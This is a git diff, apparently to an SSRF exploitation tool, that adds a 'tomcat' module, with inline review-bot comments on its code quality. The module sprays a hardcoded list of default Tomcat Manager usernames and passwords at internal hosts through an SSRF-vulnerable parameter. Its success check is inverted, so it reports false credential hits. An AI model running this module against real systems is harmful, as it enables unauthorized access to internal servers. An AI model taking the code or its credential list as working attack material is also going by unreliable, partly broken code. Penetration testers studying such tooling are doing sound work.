diff --git a/README.md b/README.md
index a883938..e7c5ca8 100644
--- a/README.md
+++ b/README.md
@@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
 | `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
 | `socksproxy` | SOCKS4 Proxy |
 | `smbhash` | Force an SMB authentication via a UNC Path |
+| `tomcat` | Bruteforce attack against Tomcat Manager |
 
 ## Contribute
 
diff --git a/core/utils.py b/core/utils.py
index eacc9ae..6673397 100644
--- a/core/utils.py
+++ b/core/utils.py
@@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
 def wrapper_dict(data, ip, port):
     return "dict://{}:{}/{}".format(ip, port, data)
 
-def wrapper_http(data, ip, port):
+def wrapper_http(data, ip, port, usernm=False, passwd=False):
+    if usernm != False and passwd != False:
+        return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
     return "http://{}:{}/{}".format(ip, port, data)
 
 def wrapper_https(data, ip, port):
diff --git a/modules/tomcat.py b/modules/tomcat.py
new file mode 100644
index 0000000..7b18cb3
--- /dev/null
+++ b/modules/tomcat.py
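Review bot: `wrapper_http` uses `False` as its "not given" sentinel and compares it with `!=`, so an empty string or `0` passed as `usernm`/`passwd` is treated as a real credential while a caller passing `None` is not; the conventional form is `def wrapper_http(data, ip, port, usernm=None, passwd=None):` with `if usernm is not None and passwd is not None:`. The userinfo part of the URL is also interpolated raw, so a value containing `@`, `:`, `/` or `#` produces a malformed URL — percent-encode both values with `urllib.parse.quote(..., safe="")` before formatting. A one-line docstring stating that `usernm`/`passwd`, when given, are embedded as the URL userinfo component would make the new parameters clear to callers.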
@@ -0,0 +1,31 @@
+from core.utils import *
+import logging
+
+name = "tomcat"
+description = "Tomcat - Bruteforce manager"
+author = "Swissky"
+documentation = [
+    "https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
+    "https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
+    ]
+
+class exploit():
+    SERVER_HOST = "127.0.0.1"
+    SERVER_PORT = "8888"
+    SERVER_TOMCAT = "manager/html"
+    tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
+    tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # Using a generator to create the host list
+        gen_host = gen_ip_list(self.SERVER_HOST, args.level)
+        for ip in gen_host:
+            for usr in self.tomcat_user:
+                for pss in self.tomcat_pass:
+                    payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
+                    r = requester.do_request(args.param, payload)
+
+                    if not "s3cret" in r.text:
+                        logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
\ No newline at end of file
diff --git a/screenshot/tomcat_example_ssrf.png b/screenshot/tomcat_example_ssrf.png
new file mode 100644
index 0000000..f2f32ab
Binary files /dev/null and b/screenshot/tomcat_example_ssrf.png differ
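Review bot: The success check `if not "s3cret" in r.text:` treats every response that merely lacks that marker — an error page, an empty or timed-out body, an unrelated host — as a found credential, so the module will log false positives; the condition should confirm a successful manager response rather than infer it from a missing substring, and if `requester.do_request` can return `None` on failure (not visible here) `r.text` will raise before the check runs. The idiomatic spelling of the test is `if "s3cret" not in r.text:`. `from core.utils import *` hides where `gen_ip_list` and `wrapper_http` come from; import the two names explicitly. The `exploit` class has no docstring; a one-line summary stating that `__init__` performs the whole scan as a side effect and only logs matches (it stores no result) would make the module's contract clear to the loader. The file also ends without a trailing newline.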